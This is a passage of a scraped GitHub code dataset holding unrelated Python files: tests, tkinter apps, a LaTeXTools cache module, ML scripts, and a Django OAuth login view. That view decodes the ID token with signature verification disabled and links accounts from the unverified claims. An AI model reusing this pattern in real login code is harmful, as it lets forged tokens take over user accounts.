'B', 'C', 'C']\n l2 = ['B', 'A']\n assert unicos_em_comum(l1, l2) == ['B']\n\n def test_exemplo2(self):\n l1 = ['A', 'A', 'B', 'C']\n l2 = ['A', 'B', 'C']\n assert unicos_em_comum(l1, l2) == ['B', 'C']\n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/unicos_comum/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28889217732","text":"import tkinter as tk\nfrom unittest import mock\nimport pytest\nfrom src.campo_minado import CampoMinado\n\n\n@pytest.mark.parametrize(\"posicao\", [\n (0, 0), \n (0, 7),\n (3, 3),\n (7, 7),\n (5, 3),\n (6, 6),\n (7, 4),\n (4, 5),\n \n \n])\ndef test_game_over_facil(posicao):\n campo_minado = CampoMinado(None, 8, 8, 10)\n\n campo_minado.tabuleiro[posicao[0]][posicao[1]] = -1\n campo_minado.game_over(mostrar_interface=False)\n\n \n assert campo_minado.botoes[posicao[0]][posicao[1]]['text'] == 'X'\n\n\n\n@pytest.mark.parametrize(\"posicao\", [\n (0, 0), \n (9, 15),\n (0, 15), \n (5, 8),\n (9, 5),\n (8, 2),\n (9, 15),\n (2,5),\n (1, 5),\n \n])\ndef test_game_over_intermediario(posicao):\n campo_minado = CampoMinado(None, 10, 16, 40)\n\n \n campo_minado.tabuleiro[posicao[0]][posicao[1]] = -1\n campo_minado.game_over(mostrar_interface=False)\n\n \n assert campo_minado.botoes[posicao[0]][posicao[1]]['text'] == 'X'\n\n\n\n@pytest.mark.parametrize(\"posicao\", [\n (0, 0), \n (23, 23), \n (0, 23),\n (12, 12),\n (23, 23),\n (22, 22), \n (5, 10), \n (15, 15),\n (19,17),\n (1, 5),\n (9,23),\n])\ndef test_game_over_dificil(posicao):\n campo_minado = CampoMinado(None, 24, 24, 0)\n\n \n campo_minado.tabuleiro[posicao[0]][posicao[1]] = -1\n campo_minado.game_over(mostrar_interface=False)\n\n \n assert campo_minado.botoes[posicao[0]][posicao[1]]['text'] == 'X'\n\n\ndef test_mostrar_bombas_apos_derrota():\n root = tk.Tk()\n campo_minado = CampoMinado(None, 8, 8, 10)\n\n \n bomb_positions = [(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (0, 7), (7, 0)]\n campo_minado.criar_tabuleiro(bomb_positions=bomb_positions)\n\n \n campo_minado.game_over(mostrar_interface=False)\n\n for x in range(8):\n for y in range(8):\n assert campo_minado.botoes[x][y]['state'] == 'disabled'\n\n root.destroy()\n\n","repo_name":"MatheusAndradeUchoa/Campo_minado","sub_path":"test/verificar_GameOver_test.py","file_name":"verificar_GameOver_test.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10148886281","text":"import tkinter as tk\nfrom tkinter import ttk\n\nROOT_GEOMETRY = '300x70'\nFIELD_OPTIONS = {'padx': 5, 'pady': 5}\n\n\nclass App(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.geometry(ROOT_GEOMETRY)\n self.resizable(False, False)\n\n self.__create_widgets()\n\n def __create_widgets(self) -> None:\n self.rowconfigure(0, weight=1)\n self.columnconfigure(0, weight=1)\n\n self.exposure_btn = ttk.Button(self, text=\"Exposure\")\n self.exposure_btn.grid(column=0, row=0, sticky=tk.NSEW,\n **FIELD_OPTIONS) # type: ignore\n\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()\n","repo_name":"MiLL4U/lightfieldpy","sub_path":"exposure_button.py","file_name":"exposure_button.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32745034146","text":"import threading\n\nclass AsyncResult(object):\n \"\"\"AsyncResult is a convenience class for async methods.\n\n It is intended as an alternative to passing callbacks to async methods\n to be notified when an async operation completes. Instead, async methods\n can return this object which the caller can use to wait for a result\n in a non-busy manner.\n \"\"\"\n\n class Timeout(Exception):\n pass\n\n def __init__(self):\n self.event = threading.Event()\n self.result = None\n self.exception = None\n \n def ready(self):\n return self.event.is_set()\n \n def get(self, block=True, timeout=None):\n if not self.ready() and block:\n self.event.wait(timeout)\n \n if not self.ready():\n raise self.Timeout(\"Timeout: result not ready\")\n \n if self.exception is not None:\n raise self.exception\n else:\n return self.result\n\n def set(self, value=None):\n self.result = value\n self.event.set()\n\n def set_exception(self, exception):\n self.exception = exception\n self.event.set()\n","repo_name":"techresidents/trpycore","sub_path":"trpycore/thread/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5843395851","text":"#chap134\r\n\r\ndef remove_even_values(dictionary):\r\n for key, value in dictionary.items():\r\n if value % 2 == 0:\r\n del dictionary[key]\r\n\r\n\r\nmy_dictionary = {\"a\":1, \"b\":2, \"c\":3, \"d\":4}\r\nremove_even_values(my_dictionary) # will throw an error\r\n\r\n# runtime error. dictionary changed size during running\r\n# deletion occurs in the for loop\r\n# mutate the dictionary\r\n# violates dictionary.items()\r\n# an example of risk of mutation\r\n\r\n\r\n","repo_name":"sophiexiaofeixue/python_oop","sub_path":"chap134.py","file_name":"chap134.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35504266591","text":"from .serializers import UserSerializer\nfrom django.contrib.auth import login\nfrom rest_framework.response import Response\nfrom rest_framework import status, permissions\nfrom users.models import User\nfrom rest_framework.decorators import permission_classes, api_view, authentication_classes\nfrom client import settings\nimport requests, random, string, base64, hashlib, jwt, hmac\n\n\nCLIENT_ID = settings.CLIENT_ID\nCLIENT_SECRET = settings.CLIENT_SECRET\nREDIRECT_URI = 'http://127.0.0.1:3000/login/'\n\n# Generate random alphanumeric string of random length up to 128 characters\nCODE_VERIFIER = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randint(43, 128)))\n# Encode in base64 with characters usable in urls\nCODE_VERIFIER = base64.urlsafe_b64encode(CODE_VERIFIER.encode('utf-8'))\n\n# Generate 256-bit hash of code verifier\nCODE_CHALLENGE = hashlib.sha256(CODE_VERIFIER).digest()\n# Encode in url-safe base64, changing bytes to string and remove '=' which has specific meaning in urls\nCODE_CHALLENGE = base64.urlsafe_b64encode(CODE_CHALLENGE).decode('utf-8').replace('=', '')\n\nAUTH_URL = \"http://127.0.0.1:8000/o/authorize/?response_type=code&code_challenge={}&code_challenge_method=S256&client_id={}&redirect_uri={}\".format(CODE_CHALLENGE, CLIENT_ID, REDIRECT_URI)\n\n\n@api_view([\"GET\"])\ndef authorize(request):\n code = request.GET.get(\"code\")\n\n if not code:\n return Response(data={\"url\": AUTH_URL})\n \n else:\n headers = {\n \"Cache-Control\": \"no-cache\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n\n data = {\n \"client_id\": CLIENT_ID,\n \"client_secret\": CLIENT_SECRET,\n \"code\": code,\n \"code_verifier\": CODE_VERIFIER,\n \"redirect_uri\": REDIRECT_URI,\n \"grant_type\": \"authorization_code\",\n }\n\n auth_request = requests.post(\n \"http://127.0.0.1:8000/o/token/\",\n headers=headers,\n data=data\n )\n\n auth_request = auth_request.json()\n\n user_data = {\n \"access_token\": auth_request.get(\"access_token\"),\n \"expires_in\": auth_request.get(\"expires_in\"),\n \"token_type\": auth_request.get(\"token_type\"),\n \"scope\": auth_request.get(\"scope\"),\n \"refresh_token\": auth_request.get(\"refresh_token\"),\n }\n\n id_token = auth_request.get(\"id_token\")\n\n decrypted_id_token = jwt.decode(\n id_token,\n key=CLIENT_SECRET,\n algorithms=[\"HS256\"],\n options={\"verify_signature\": False}\n )\n\n user_data[\"sub\"] = decrypted_id_token.get(\"sub\")\n user_data[\"username\"] = decrypted_id_token.get(\"username\")\n user_data[\"email\"] = decrypted_id_token.get(\"email\")\n user_data[\"first_name\"] = decrypted_id_token.get(\"first_name\")\n user_data[\"last_name\"] = decrypted_id_token.get(\"last_name\")\n\n user = User.objects.filter(sub=user_data.get(\"sub\"))\n localuser = User.objects.filter(username=user_data.get(\"username\"), sub=None)\n\n # If user with matching foreign ID exists, update fields\n if user.exists():\n serializer = UserSerializer(user[0], data=user_data)\n # If user exists locally and has not been assigned foreign ID\n elif localuser.exists():\n serializer = UserSerializer(localuser[0], data=user_data)\n # Else create new user\n else:\n serializer = UserSerializer(data=user_data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n ","repo_name":"Altagrave-Git/authclient","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13738406059","text":"#!/usr/bin/env python\nimport torch\nimport librosa\nfrom fairseq.models.wav2vec import Wav2VecModel\n\ncp = torch.load('../data/models/word2vec/wav2vec_large.pt', map_location=torch.device('cpu'))\nmodel = Wav2VecModel.build_model(cp['args'], task=None)\nmodel.load_state_dict(cp['model'])\nmodel.eval()\n\nwave_file_path = '../data/audio/go-forward-two-meters-and-then-stop.rate16k-mono.wav'\n# wav_input = librosa.load(wave_file_path)\nsignal, sr = librosa.load(wave_file_path)\ntensors = torch.from_numpy(signal)\nz = model.feature_extractor(tensors)\nc = model.feature_aggregator(z)\nprint('c:', c)\n","repo_name":"chrisspen/speech-to-text-test","sub_path":"src/test_word2vec.py","file_name":"test_word2vec.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70040114294","text":"import octoprint.plugin\nfrom jinja2 import BaseLoader, Environment\n\nfrom .const import (\n DEFAULT_SCRIPTS,\n ON_CONNECT,\n ON_CONNECT_OPTIONS,\n TYPE,\n TYPE_OPTIONS,\n WHEN,\n WHEN_OPTIONS,\n)\n\n\nclass GcodeScriptManagerPlugin(\n octoprint.plugin.SettingsPlugin,\n octoprint.plugin.AssetPlugin,\n octoprint.plugin.TemplatePlugin,\n octoprint.plugin.StartupPlugin,\n):\n def __init__(self):\n super().__init__()\n\n defaults = self.get_settings_defaults()\n self._scripts = defaults[\"scripts\"]\n self._update_settings()\n\n def _update_client_settings(self):\n self._plugin_manager.send_plugin_message(\n self._identifier,\n {\n \"settings\": {\n \"scripts\": self._scripts,\n }\n },\n )\n\n ##~~ SettingsPlugin mixin\n\n def get_settings_defaults(self):\n return {\n \"consts\": {\n \"onConnectOptions\": ON_CONNECT_OPTIONS,\n \"typeOptions\": TYPE_OPTIONS,\n \"whenOptions\": WHEN_OPTIONS\n },\n \"scripts\": DEFAULT_SCRIPTS,\n }\n\n def on_settings_save(self, data):\n octoprint.plugin.SettingsPlugin.on_settings_save(self, data)\n self.read_settings()\n\n def read_settings(self):\n self._scripts = self._settings.get([\"scripts\"])\n self._update_settings()\n\n def _update_settings(self):\n self._enabled_script_types = set(sum(\n [[ss[\"type\"] for ss in s[\"scripts\"]] for s in self._scripts],\n start=[]\n ))\n\n def write_settings(self, notify=True):\n self._settings.set([\"scripts\"], self._scripts)\n self._settings.save()\n if notify:\n self._update_client_settings()\n\n ##~~ AssetPlugin mixin\n\n def get_assets(self):\n return {\n \"js\": [\"js/gcodescriptmanager.js\"],\n \"css\": [\"css/gcodescriptmanager.css\"],\n \"less\": [\"less/gcodescriptmanager.less\"],\n }\n\n ##~~ TemplatePlugin mixin\n\n def get_template_configs(self):\n return [\n {\n \"type\": \"settings\",\n \"name\": \"GCODE Script Manager\",\n \"template\": \"gcodescriptmanager_settings.jinja2\",\n \"custom_bindings\": True,\n },\n {\n \"type\": \"sidebar\",\n \"name\": \"GCODE Scripts\",\n \"template\": \"gcodescriptmanager_sidebar.jinja2\",\n \"custom_bindings\": True,\n \"icon\": \"fas fa-scroll\",\n },\n ]\n\n ##~~ StartupPlugin mixin\n\n def on_after_startup(self):\n self.read_settings()\n return super().on_after_startup()\n\n ##~~ GcodeScript Hook\n\n def gcode_script_hook(self, comm, script_type, script_name, *args, **kwargs):\n if not script_type == \"gcode\":\n return None\n if script_name not in self._enabled_script_types:\n return None\n\n should_save = False\n prefix, suffix = \"\", \"\"\n context = {\n \"printer_profile\": comm._printerProfileManager.get_current_or_default(),\n \"last_position\": comm.last_position,\n \"last_temperature\": comm.last_temperature.as_script_dict(),\n \"last_fanspeed\": comm.last_fanspeed,\n }\n\n if script_name in (TYPE.AFTER_PRINT_PAUSED, TYPE.BEFORE_PRINT_RESUMED):\n context.update(\n {\n \"pause_position\": comm.pause_position,\n \"pause_temperature\": comm.pause_temperature.as_script_dict(),\n \"pause_fanspeed\": comm.pause_fanspeed,\n }\n )\n elif script_name == TYPE.AFTER_PRINT_CANCELLED:\n context.update(\n {\n \"cancel_position\": comm.cancel_position,\n \"cancel_temperature\": comm.cancel_temperature.as_script_dict(),\n \"cancel_fanspeed\": comm.cancel_fanspeed,\n }\n )\n\n loader = BaseLoader()\n for script in self._scripts:\n if not script[\"enabled\"]:\n continue\n for _script in script[\"scripts\"]:\n if _script[\"type\"] == script_name:\n self._logger.info(\n \"Adding Gcode Script '%(name)s' on '%(type)s', '%(when)s'\",\n {\n \"name\": script[\"name\"],\n \"type\": _script[\"type\"],\n \"when\": _script[\"when\"],\n }\n )\n template = Environment(loader=loader).from_string(_script[\"script\"])\n rendered = template.render(**context)\n\n if _script[\"when\"] == WHEN.BEFORE_DEFAULT:\n prefix += \"\\n\" + rendered\n else:\n suffix += \"\\n\" + rendered\n\n if script[\"autoDisable\"]:\n script[\"enabled\"] = False\n should_save = True\n\n if should_save:\n self.write_settings()\n\n return prefix, suffix, {}\n\n ##~~ HandleConnect Hook\n\n def handle_connect_hook(self, *args, **kwargs):\n if any([e['onConnect'] != ON_CONNECT.UNCHANGED for e in self._scripts]):\n for script in self._scripts:\n if script[\"onConnect\"] == ON_CONNECT.ENABLED:\n self._logger.info(\n \"Enabling Script on Connect: '%(name)s'\",\n {\"name\": script[\"name\"]}\n )\n script[\"enabled\"] = True\n elif script[\"onConnect\"] == ON_CONNECT.DISABLED:\n self._logger.info(\n \"Disabling Script on Connect: '%(name)s'\",\n {\"name\": script[\"name\"]}\n )\n script[\"enabled\"] = False\n self.write_settings()\n\n ##~~ Softwareupdate hook\n\n def get_update_information(self):\n return {\n \"gcodescriptmanager\": {\n \"displayName\": \"GCODE Script Manager\",\n \"displayVersion\": self._plugin_version,\n # version check: github repository\n \"type\": \"github_release\",\n \"user\": \"kforth\",\n \"repo\": \"OctoPrint-GcodeScriptManager\",\n \"current\": self._plugin_version,\n # update method: pip\n \"pip\": \"https://github.com/kforth/OctoPrint-GcodeScriptManager/archive/{target_version}.zip\",\n }\n }\n\n\n__plugin_name__ = \"GCODE Script Manager\"\n\n__plugin_pythoncompat__ = \">=3,<4\" # Only Python 3\n\n\ndef __plugin_load__():\n global __plugin_implementation__\n __plugin_implementation__ = GcodeScriptManagerPlugin()\n\n global __plugin_hooks__\n __plugin_hooks__ = {\n \"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information,\n \"octoprint.comm.protocol.scripts\": __plugin_implementation__.gcode_script_hook,\n \"octoprint.printer.handle_connect\": __plugin_implementation__.handle_connect_hook,\n }\n","repo_name":"kForth/OctoPrint-GcodeScriptManager","sub_path":"octoprint_gcodescriptmanager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38617597355","text":"\nimport os\nimport re\n\nimport cv2\nimport numpy as np\n\n\ndef read_calib(calib_path):\n with open(calib_path) as f:\n for line in f.readlines():\n if line[:2] == \"P2\":\n P2 = re.split(\" \", line.strip())\n P2 = np.array(P2[-12:], np.float32)\n P2 = P2.reshape((3, 4))\n if line[:14] == \"Tr_velo_to_cam\" or line[:11] == \"Tr_velo_cam\":\n vtc_mat = re.split(\" \", line.strip())\n vtc_mat = np.array(vtc_mat[-12:], np.float32)\n vtc_mat = vtc_mat.reshape((3, 4))\n vtc_mat = np.concatenate([vtc_mat, [[0, 0, 0, 1]]])\n if line[:7] == \"R0_rect\" or line[:6] == \"R_rect\":\n R0 = re.split(\" \", line.strip())\n R0 = np.array(R0[-9:], np.float32)\n R0 = R0.reshape((3, 3))\n R0 = np.concatenate([R0, [[0], [0], [0]]], -1)\n R0 = np.concatenate([R0, [[0, 0, 0, 1]]])\n vtc_mat = np.matmul(R0, vtc_mat)\n\n return P2, vtc_mat\n\n\n\ndef convertformat_det_to_track(det,frame):\n # print()\n #lidar coor, dx,dy,dz,x,y,z,yaw,id\n calib_path = os.path.join('/mnt/nas3/Data/kitti-processed/object_tracking/training/calib',str(frame).zfill(4)+\"txt\")\n intrinsic, extrinsic = read_calib(calib_path)\n ","repo_name":"ies0411/Swift3DMot","sub_path":"tools/tracking_modules/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73027149493","text":"import os\nimport re\nimport shutil\nimport hashlib\nimport time\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nimport sublime\n\nif sublime.version() < '3000':\n _ST3 = False\n from latextools_utils import get_setting\nelse:\n _ST3 = True\n from . import get_setting\n long = int\n\n# the folder, if the local cache is not hidden, i.e. folder in the same\n# folder as the tex root\nLOCAL_CACHE_FOLDER = \".st_lt_cache\"\n# folder to store all hidden local caches in the cache path\nHIDDEN_LOCAL_CACHE_FOLDER = \"local_cache\"\n# global cache folder for ST2, this folder will be created inside the User\n# folder to store the global and the local cache\nST2_GLOBAL_CACHE_FOLDER = \".lt_cache\"\n\n\nTIME_RE = re.compile(\n r\"\\s*(?:(?P\\d+)\\s*d(?:ays?)?)?\"\n r\"\\s*(?:(?P\\d+)\\s*h(?:ours?)?)?\"\n r\"\\s*(?:(?P\\d+)\\s*m(?:in(?:utes?)?)?)?\"\n r\"\\s*(?:(?P\\d+)\\s*s(?:ec(?:onds?)?)?)?\\s*\"\n)\n\n\nclass CacheMiss(Exception):\n \"\"\"exception to indicate that the cache file is missing\"\"\"\n pass\n\n\ndef hash_digest(text):\n \"\"\"\n Create the hash digest for a text. These digest can be used to\n create a unique filename from the path to the root file.\n The used has function is md5.\n\n Arguments:\n text -- the text for which the digest should be created\n \"\"\"\n text_encoded = text.encode(\"utf8\")\n hash_result = hashlib.md5(text_encoded)\n return hash_result.hexdigest()\n\n\ndef delete_local_cache(tex_root):\n \"\"\"\n Removes the local cache folder and the local cache files\n \"\"\"\n print(u\"Deleting local cache for '{0}'.\".format(repr(tex_root)))\n local_cache_paths = [_hidden_local_cache_path(),\n _local_cache_path(tex_root)]\n for cache_path in local_cache_paths:\n if os.path.exists(cache_path):\n print(u\"Delete local cache folder '{0}'\".format(repr(cache_path)))\n shutil.rmtree(cache_path)\n\n\ndef invalidate_local_cache(cache_path):\n \"\"\"\n Invalidates the local cache by removing the cache folders\n \"\"\"\n if os.path.exists(cache_path):\n print(u\"Invalidate local cache '{0}'.\".format(repr(cache_path)))\n shutil.rmtree(cache_path)\n\n\ndef cache(tex_root, name, generate):\n \"\"\"\n Alias for cache_local:\n Uses the local cache to retrieve the entry for the name.\n If the entry is not available, it will be calculated via the\n generate-function and cached using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root.\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n generate -- a function pointer/closure to create the cached object\n for case it is not available in the cache,\n must be compatible with pickle\n \"\"\"\n return cache_local(tex_root, name, generate)\n\n\ndef write(tex_root, name, obj):\n \"\"\"\n Alias for write_local:\n Writes the object to the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n obj -- the object to write, must be compatible with pickle\n \"\"\"\n write_local(tex_root, name, obj)\n\n\ndef read(tex_root, name):\n \"\"\"\n Alias for read_local:\n Reads the object from the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to read the object\n\n Returns:\n The object at the location with the name\n \"\"\"\n return read_local(tex_root, name)\n\n\ndef cache_local(tex_root, name, generate):\n \"\"\"\n Uses the local cache to retrieve the entry for the name.\n If the entry is not available, it will be calculated via the\n generate-function and cached using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root.\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n generate -- a function pointer/closure to create the cached object\n for case it is not available in the cache,\n must be compatible with pickle\n \"\"\"\n try:\n result = read_local(tex_root, name)\n except CacheMiss:\n result = generate()\n write_local(tex_root, name, result)\n return result\n\n\ndef write_local(tex_root, name, obj):\n \"\"\"\n Writes the object to the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n obj -- the object to write, must be compatible with pickle\n \"\"\"\n cache_path = _local_cache_path(tex_root)\n _write(cache_path, name, obj)\n _create_cache_timestamp(cache_path)\n\n\ndef read_local(tex_root, name):\n \"\"\"\n Reads the object from the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to read the object\n\n Returns:\n The object at the location with the name\n \"\"\"\n cache_path = _local_cache_path(tex_root)\n _validate_life_span(cache_path)\n return _read(cache_path, name)\n\n\ndef cache_global(name, generate):\n \"\"\"\n Uses the global sublime cache retrieve the entry for the name.\n If the entry is not available, it will be calculated via the\n generate-function and cached using pickle.\n\n Arguments:\n name -- the relative file name to write the object\n generate -- a function pointer/closure to create the cached object\n for case it is not available in the cache,\n must be compatible with pickle\n \"\"\"\n try:\n result = read_global(name)\n except CacheMiss:\n result = generate()\n write_global(name, result)\n return result\n\n\ndef write_global(name, obj):\n \"\"\"\n Writes the object to the global sublime cache path using pickle\n\n Arguments:\n name -- the relative file name to write the object\n obj -- the object to write, must be compatible with pickle\n \"\"\"\n cache_path = _global_cache_path()\n _write(cache_path, name, obj)\n\n\ndef read_global(name):\n \"\"\"\n Reads the object from the global sublime cache path using pickle\n\n Arguments:\n name -- the relative file name to read the object\n\n Returns:\n The object at the location with the name\n \"\"\"\n cache_path = _global_cache_path()\n return _read(cache_path, name)\n\n\ndef _local_cache_path(tex_root):\n hide_cache = get_setting(\"hide_local_cache\", True)\n\n if not hide_cache:\n root_folder = os.path.dirname(tex_root)\n return os.path.join(root_folder, LOCAL_CACHE_FOLDER)\n else:\n cache_path = _hidden_local_cache_path()\n # convert the root to plain string and hash it\n root_hash = hash_digest(tex_root)\n return os.path.join(cache_path, root_hash)\n\n\ndef _hidden_local_cache_path():\n global_path = _global_cache_path()\n return os.path.join(global_path, HIDDEN_LOCAL_CACHE_FOLDER)\n\n\ndef _global_cache_path():\n # For ST3, put the cache files in cache dir\n # and for ST2, put it in the user packages dir\n if _ST3:\n cache_path = os.path.join(sublime.cache_path(), \"LaTeXTools\")\n else:\n cache_path = os.path.join(sublime.packages_path(),\n \"User\",\n ST2_GLOBAL_CACHE_FOLDER)\n return os.path.normpath(cache_path)\n\n\ndef _write(cache_path, name, obj):\n if _ST3:\n try:\n os.makedirs(cache_path, exist_ok=True)\n except FileExistsError:\n pass\n else:\n if not os.path.isdir(cache_path):\n os.makedirs(cache_path)\n\n file_path = os.path.join(cache_path, name)\n with open(file_path, \"wb\") as f:\n pickle.dump(obj, f, protocol=-1)\n\n\ndef _read(cache_path, name):\n file_path = os.path.join(cache_path, name)\n if not os.path.exists(file_path):\n raise CacheMiss()\n\n with open(file_path, \"rb\") as f:\n return pickle.load(f)\n\n\n_CACHE_TIMESTAMP_FILE = \"created_time_stamp\"\n\n\ndef _create_cache_timestamp(cache_path):\n \"\"\"\n Creates a life span with the current time (cache folder exist).\n Does only create a timestamp if it does not already exists.\n \"\"\"\n access_path = os.path.join(cache_path, _CACHE_TIMESTAMP_FILE)\n if not os.path.exists(access_path):\n print(u\"Writing cache creation timestamp\")\n created = long(time.time())\n try:\n with open(access_path, \"w\") as f:\n f.write(str(created))\n except Exception as e:\n print(u\"Error occured writing cache creation timestamp\")\n print(e)\n\n\ndef _validate_life_span(cache_path):\n life_span = _read_life_span()\n # if life span is none: only manual deletion\n if life_span is None:\n return\n\n created = _read_cache_timestamp(cache_path)\n\n current_time = long(time.time())\n if created + life_span < current_time:\n print(u\"Life span of local cache is over. Invalidate local cache.\")\n invalidate_local_cache(cache_path)\n raise CacheMiss(u\"Cache life span expired\")\n\n\ndef _read_cache_timestamp(cache_path):\n access_path = os.path.join(cache_path, _CACHE_TIMESTAMP_FILE)\n try:\n with open(access_path, \"r\") as f:\n created = long(f.read())\n except:\n print(u\"No creation timestamp for local cache\")\n invalidate_local_cache(cache_path)\n raise CacheMiss(u\"Life span timestamp missing\")\n return created\n\n\ndef _read_life_span():\n try:\n life_span_string = get_setting(\"local_cache_life_span\")\n if not life_span_string:\n raise Exception(u\"No lifespan defined\")\n if life_span_string == \"infinite\":\n return None\n life_span = _parse_life_span_string(life_span_string)\n except:\n life_span = 30 * 60 # default: 30 mins\n return life_span\n\n\ndef _parse_life_span_string(life_span_string):\n \"\"\"Parses a life span string, raises an exception if it cannot parse\"\"\"\n try:\n life_span = int(life_span_string)\n except:\n life_span = _convert_life_span_string(life_span_string)\n if life_span <= 0:\n raise Exception(\"Life span must be greater than 0\")\n return life_span\n\n\ndef _convert_life_span_string(life_span_string):\n \"\"\"Converts a TIME_RE compatible life span string,\n raises an exception if it is not compatible\"\"\"\n (d, h, m, s) = TIME_RE.match(life_span_string).groups()\n # time conversions in seconds\n times = [(s, 1), (m, 60), (h, 3600), (d, 86400)]\n # sum the converted times\n # if not specified (None) use 0\n return sum(int(t[0] or 0) * t[1] for t in times)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/SublimeText_LaTeXTools/LaTeXTools-master/latextools_utils/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":11100,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"28005765246","text":"'''\nIterative_bagging\n'''\nimport argparse\nimport os.path as osp\nimport copy\n\nimport numpy as np\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import LinearSVC\nfrom pandas import DataFrame\nfrom collections import defaultdict\nfrom sklearn.metrics import mean_squared_error\nimport random\n\nfrom ..data import create\nfrom ..utils.utils import draw_line_chart, save_results\n\ndef get_RMSE(predicted, gt):\n return np.sqrt(mean_squared_error(predicted,gt))\n \n\ndef iterative_bagging(args):\n epoch_num = args.epoch_num\n predictor_num = args.predictor_num\n x_train, x_test, y_train, y_test = create('concrete',args.data_dir) # initial x,y for train and test\n x_train = np.array(x_train)\n x_test = np.array(x_test)\n y_train = np.array(y_train)\n y_test = np.array(y_test)\n train_num = np.shape(x_train)[0]\n test_num = np.shape(x_test)[0]\n train_residual = copy.deepcopy(y_train) # y_n^j, the residual to fit in j-th iteration\n test_predict = np.array([0]*test_num) # the predict result after j-th iteration\n log = []\n for t in range(epoch_num):\n # print(train_residual[0])\n train_predict_dict = defaultdict(list)\n for i in range(predictor_num):\n tmpIds = []\n id_get = {}\n valid_id = []\n for j in range(train_num):\n tmpId = random.randint(0,train_num-1)\n tmpIds.append(tmpId)\n id_get[tmpId] = True\n for j in range(train_num):\n if j not in id_get:\n valid_id.append(j) # samples that not included in tmp trainset\n tmp_x_train = x_train[tmpIds]\n tmp_train_residual = train_residual[tmpIds]\n clf = DecisionTreeRegressor(max_depth=2)\n clf.fit(tmp_x_train, tmp_train_residual)\n train_predict = clf.predict(x_train)\n for j in valid_id:\n train_predict_dict[j].append(train_predict[j])\n test_predict = test_predict + clf.predict(x_test)*(1.0/predictor_num) # update the predict for sample j in testSet\n for i in train_predict_dict:\n train_residual[i] -= np.mean(train_predict_dict[i]) # update the residual of sample i in trainSet\n tRMSE = get_RMSE(test_predict,y_test)\n print('{}\\t{}'.format(t+1,tRMSE))\n sum_square_residual = np.mean(train_residual*train_residual) \n if args.VIS:\n log.append([t + 1, tRMSE])\n if t==0:\n min_sum_square_residual = sum_square_residual\n else:\n if sum_square_residual > 1.1*min_sum_square_residual:\n break\n if sum_square_residual < min_sum_square_residual:\n min_sum_square_residual = sum_square_residual\n if args.VIS:\n draw_line_chart(DataFrame(log, columns=['the number of epochs', 'RMSE']), 'the number of epochs', 'RMSE',\n 'iterative_bagging_concrete')\n save_results(test_predict, osp.join(args.results_dir, 'iterative_bagging_concrete.txt'))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--epoch_num', type=int, default=50)\n parser.add_argument('--predictor_num', type=int, default=30)\n parser.add_argument('--data_dir', type=str, default='/Users/gaojingyue/Desktop/bagging_boosting/data/concrete')\n parser.add_argument('--results_dir', type=str, default='/Users/gaojingyue/Desktop/bagging_boosting/results')\n parser.add_argument('--VIS', action='store_true',default=False)\n 